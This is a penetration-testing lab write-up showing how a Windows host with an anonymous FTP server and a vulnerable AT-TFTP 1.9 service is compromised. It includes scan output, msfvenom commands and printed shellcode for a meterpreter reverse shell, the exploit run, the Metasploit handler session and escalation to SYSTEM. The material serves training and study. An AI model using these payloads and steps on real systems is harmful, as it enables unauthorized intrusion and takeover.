0x00 Preface

This article walks through a penetration-testing case in which information is collected step by step until the target host is finally compromised.

0x01 Case analysis

Lab environment:

  • Target range: 10.11.1.0/24
  • Attacker machine: Kali Linux (10.11.0.74)

Penetration process:

First, run a service and port scan:

# nmap -sT -Pn 10.11.1.226
Starting Nmap 7.50 ( https://nmap.org ) at 2017-09-10 03:35 CST
Nmap scan report for 10.11.1.226
Host is up (0.14s latency).
Not shown: 998 filtered ports
PORT     STATE  SERVICE
21/tcp   open   ftp
3389/tcp closed ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 35.58 seconds

As we can see, the target host runs FTP and RDP services. A quick test shows that the FTP server allows anonymous login.

# ftp 10.11.1.226
Connected to 10.11.1.226.
220-exploitme
220 Please enter your name:
Name (10.11.1.226:root): anonymous
331 User name okay, Need password.
Password:
230 User logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls (468 bytes).
-rwxrw-rw- 1 root  root        0 Dec 24  2009 AUTOEXEC.BAT
-rwxrw-rw- 1 root  root        0 Dec 24  2009 CONFIG.SYS
drwxrw-rw- 1 root  root        0 Sep 19  2011 Documents and Settings
drwxrw-rw- 1 root  root        0 Dec 24  2009 ftproot
drwxrw-rw- 1 root  root        0 Dec 27  2012 Program Files
drwxrw-rw- 1 root  root        0 Jun 16  2016 Python26
drwxrw-rw- 1 root  root        0 Apr 20  2016 WINDOWS
drwxrw-rw- 1 root  root        0 Dec 24  2009 wmpub
226 Transfer successful.
ftp> cd "Documents and Settings"
250 "/Documents and Settings" is current directory.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls (108 bytes).
drwxrw-rw- 1 root  root        0 Dec 24  2009 All Users
drwxrw-rw- 1 root  root        0 Aug 18  2015 joe
226 Transfer successful.
ftp> cd joe
250 "/Documents and Settings/joe" is current directory.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls (401 bytes).
drwxrw-rw- 1 root  root        0 Aug 18  2015 .idlerc
drwxrw-rw- 1 root  root        0 Dec 24  2009 Cookies
drwxrw-rw- 1 root  root        0 Aug 18  2015 Desktop
drwxrw-rw- 1 root  root        0 Sep 19  2011 Favorites
drwxrw-rw- 1 root  root        0 Sep 19  2011 My Documents
drwxrw-rw- 1 root  root        0 Dec 23  2009 Start Menu
-rwxrw-rw- 1 root  root        0 Dec 23  2009 Sti_Trace.log
226 Transfer successful.
ftp> cd Desktop
250 "/Documents and Settings/joe/Desktop" is current directory.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls (130 bytes).
-rwxrw-rw- 1 root  root      694 Dec 24  2009 GuildFTPd FTP Deamon.lnk
-rwxrw-rw- 1 root  root     2417 Dec  8  2015 servers.py
226 Transfer successful.
ftp> cat servers.py
?Invalid command
ftp> type servers.py
servers.py: unknown mode
ftp> get servers.py
local: servers.py remote: servers.py
200 PORT command successful.
150 Opening binary mode data connection for /Documents and Settings/joe/Desktop/servers.py (2417 bytes).
226 Transfer complete. 2417 bytes in 1 sec. (2.42 Kb/s).
2417 bytes received in 0.01 secs (413.8064 kB/s)
ftp>
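The listing above shows the FTP root exposing the whole system drive, with every entry world-writable. The following added example (not part of the original post) parses such a UNIX-style FTP listing and flags the two findings a reviewer would record: world-writable entries and system directories that should never sit under an anonymous FTP root. The sample listing is constructed from the lines seen above; the set of sensitive directory names is an assumption.

```python
# Added example: audit an anonymous-FTP directory listing for
# world-writable entries and exposed system paths (not the post's own code).
import re
from typing import List, NamedTuple

class Entry(NamedTuple):
    perms: str
    size: int
    name: str
    is_dir: bool

# Constructed sample, taken from the root listing seen over anonymous FTP.
SAMPLE_LISTING = """\
-rwxrw-rw- 1 root  root        0 Dec 24  2009 AUTOEXEC.BAT
drwxrw-rw- 1 root  root        0 Sep 19  2011 Documents and Settings
drwxrw-rw- 1 root  root        0 Dec 24  2009 ftproot
drwxrw-rw- 1 root  root        0 Apr 20  2016 WINDOWS
-rwxrw-rw- 1 root  root     2417 Dec  8  2015 servers.py
226 Transfer successful.
"""

# Assumed list of directory names that indicate the FTP root is the OS drive.
SENSITIVE_ROOTS = {"windows", "documents and settings", "program files"}

# perms, links, owner, group, size, month, day, year-or-time, name
LINE_RE = re.compile(
    r"^([d-][rwx-]{9})\s+\d+\s+\S+\s+\S+\s+(\d+)\s+\w{3}\s+\d{1,2}\s+\S+\s+(.+)$"
)

def parse_listing(text: str) -> List[Entry]:
    """Parse 'ls -l' style lines as sent by the FTP server; skip status lines."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.rstrip())
        if not m:
            continue  # e.g. '226 Transfer successful.'
        perms, size, name = m.groups()
        entries.append(Entry(perms, int(size), name, perms[0] == "d"))
    return entries

def world_writable(entries: List[Entry]) -> List[str]:
    """Names whose 'other' write bit is set: any client, anonymous included, can modify them."""
    return [e.name for e in entries if e.perms[8] == "w"]

def exposed_system_dirs(entries: List[Entry]) -> List[str]:
    """Directories showing the FTP root is not confined to a dedicated folder."""
    return [e.name for e in entries if e.is_dir and e.name.lower() in SENSITIVE_ROOTS]
```

Both findings together explain the rest of the case: an unconfined, world-writable FTP root lets anyone read (or replace) files such as servers.py.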

An interesting file, servers.py, sits in the FTP directory, so we download it and take a look.

# cat servers.py
import wmi, time, ftplib, tftpy

print "[*] Start"
print ""

def isFTPworking():
    # Try an anonymous login against the local FTP server.
    print "[*] Checking FTP connection..."
    try:
        ftp = ftplib.FTP('10.11.1.226', timeout=5)
        ftp.login()
    except:
        print "[!] FTP not working!!"
        return False
    print "[*] FTP is working."
    return True

def isTFTPworking():
    # Try a download from the local TFTP server.
    print "[*] Checking TFTP connection..."
    try:
        tftp = tftpy.TftpClient('10.11.1.226', 69)
        tftp.download("C:/windows/temp/test.txt", "C:/windows/temp/test2.txt")
    except:
        print "[!] TFTP not working!!"
        return False
    print "[*] TFTP is working."
    return True

def killProcess(processname):
    print "[*] Killing process: " + processname
    try:
        c = wmi.WMI()
        for process in c.Win32_Process():
            if process.Name == processname:
                process.Terminate()
    except:
        print "[!] Exception while killing process"
    return True

def startProcess(processpath):
    print "[*] Creating process: " + processpath
    try:
        c = wmi.WMI()
        pid, result = c.Win32_Process.Create(processpath)
    except IOError:
        print "[*] Exception while creating process " + processpath
    return

def isProcessAlive(processname):
    print "[*] Checking process: " + processname
    check = False
    try:
        c = wmi.WMI()
        for process in c.Win32_Process():
            if process.Name == processname:
                check = True
        if not check:
            return False
    except:
        print "[!] Exception while using wmi interface"
    return True

if __name__ == '__main__':
    ftpproc   = 'GuildFTPd.exe'
    tftpproc  = 'tftpd.exe'
    processes = {'GuildFTPd.exe': r'"C:\\Program Files\\GuildFTPd\\GuildFTPd.exe"',
                 'tftpd.exe': r'"C:\\Program Files\\Allied Telesyn\\AT-TFTP Server 1.9\\tftpd.exe"'}
    # Watchdog loop: restart either service whenever its process is gone or it stops answering.
    while True:
        for processname in processes.keys():
            if not isProcessAlive(processname):
                startProcess(processes[processname])
        if not isFTPworking():
            killProcess(ftpproc)
            time.sleep(5)
            startProcess(processes[ftpproc])
        if not isTFTPworking():
            killProcess(tftpproc)
            time.sleep(5)
            startProcess(processes[tftpproc])
        time.sleep(30)

Clearly, this is a Python watchdog script that starts the FTP and TFTP services and restarts them whenever they die. Recalling that our earlier scan showed FTP open on the target, we suspect this script is what keeps it running. The process paths in the code also tell us that AT-TFTP Server 1.9 is installed on the target. A scan of TFTP port 69 (UDP) confirms that it is open:

# nmap -sU -Pn -p 69 10.11.1.226
Starting Nmap 7.50 ( https://nmap.org ) at 2017-09-10 03:44 CST
Nmap scan report for 10.11.1.226
Host is up (0.12s latency).
PORT   STATE SERVICE
69/udp open  tftp
MAC Address: 00:50:56:89:7B:69 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.54 seconds

A Google search shows that AT-TFTP 1.9 has a buffer-overflow RCE vulnerability: <https://github.com/brianwrf/cve-2006-6184>

So we use the following steps to generate shellcode for a meterpreter reverse shell and substitute it for the corresponding shellcode in the exploit script atftp.py:

# perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=10.11.0.74 LPORT=4444 R > payload
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 177 bytes
# cat stackadj payload > shellcode
# cat shellcode | msfvenom -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f python
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 210 (iteration=0)
x86/shikata_ga_nai chosen with final size 210
Payload size: 210 bytes
Final size of python file: 1020 bytes
buf =  ""
buf += "\xdd\xc1\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x2e\xbf\x13"
buf += "\x73\xb1\x20\x31\x78\x1a\x03\x78\x1a\x83\xe8\xfc\xe2"
buf += "\xe6\xf2\x5d\x8c\x05\xf5\x9d\x31\x7f\x1e\xda\x21\x86"
buf += "\x1f\x1a\x4e\x18\xd1\x3e\x3a\xa5\x2d\x4a\x41\x68\x36"
buf += "\x4d\x55\x19\x91\x6d\xa8\xf7\x95\x5a\x30\x06\x44\x93"
buf += "\x84\x91\x34\x15\xce\xac\x45\x54\x4b\x6e\x30\xae\x17"
buf += "\x08\x82\x84\xed\x37\xbf\x93\x41\x93\x41\x4d\x3b\x50"
buf += "\x5d\xd4\x4f\x29\x42\xe7\xa6\xb6\x56\x7e\xb1\xd4\x82"
buf += "\x9c\xa3\xdb\x2b\xad\xf8\x47\x27\x8d\xce\x0c\x77\x1e"
buf += "\xa4\x62\x64\xb3\x31\xea\x9c\x95\x23\xb9\xfa\x41\x9f"
buf += "\x0f\x6b\xe5\xac\x5d\x34\x5d\x35\x18\xb8\x3d\x46\x8c"
buf += "\xa8\xed\xeb\x63\x80\x52\x5f\xc0\x75\xdc\xb8\xa0\xf8"
buf += "\x31\x4e\x2e\xac\x9e\x29\x97\xb5\xfe\x49\x31\x5f\xb8"
buf += "\x1e\xd2\x5f\x6c\xc9\x44\xaa\x9a\xf6\xde\xcc\xf4\xe7"
buf += "\x82\x76\x56\x81\xd9\x1d\x48\xc2\x4a\x84\xd1\xb3\x71"
buf += "\xb7\xf4\x6c\xcd\x4b\xa9\xdf\x7a\x07\x2f\x59\x44\x9f"
buf += "\x50\x7f"

Start the MSF listener and run the exploit script.

# python atftp.py 10.11.1.226 69 10.11.0.74 9

We then obtain a meterpreter reverse shell, as shown below:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_nonx_tcp
payload => windows/meterpreter/reverse_nonx_tcp
msf exploit(handler) > set LHOST 10.11.0.74
LHOST => 10.11.0.74
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 10.11.0.74:4444
msf exploit(handler) > [*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (171583 bytes) to 10.11.1.226
[*] Meterpreter session 1 opened (10.11.0.74:4444 -> 10.11.1.226:1144) at 2017-09-10 03:57:12 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
msf exploit(handler) > sessions

Active sessions
===============

Id  Type                     Information    Connection
--  ----                     -----------    ----------
1   meterpreter x86/windows  JOE\joe @ JOE  10.11.0.74:4444 -> 10.11.1.226:1144 (10.11.1.226)

Migrate the current meterpreter process (PID 3716) into a stable process, vmtoolsd.exe (PID 1776), then run getsystem to escalate privileges. In the end we obtain a meterpreter reverse shell running as SYSTEM.

0x02 Summary

The approach taken in this case, in summary:

  • Start with a service and port scan
  • Find that FTP allows anonymous login, and through it discover a valuable script file
  • From the script, guess and then verify that the target runs a vulnerable TFTP service
  • Adapt the exploit code and attempt exploitation
  • Obtain a reverse shell and escalate privileges
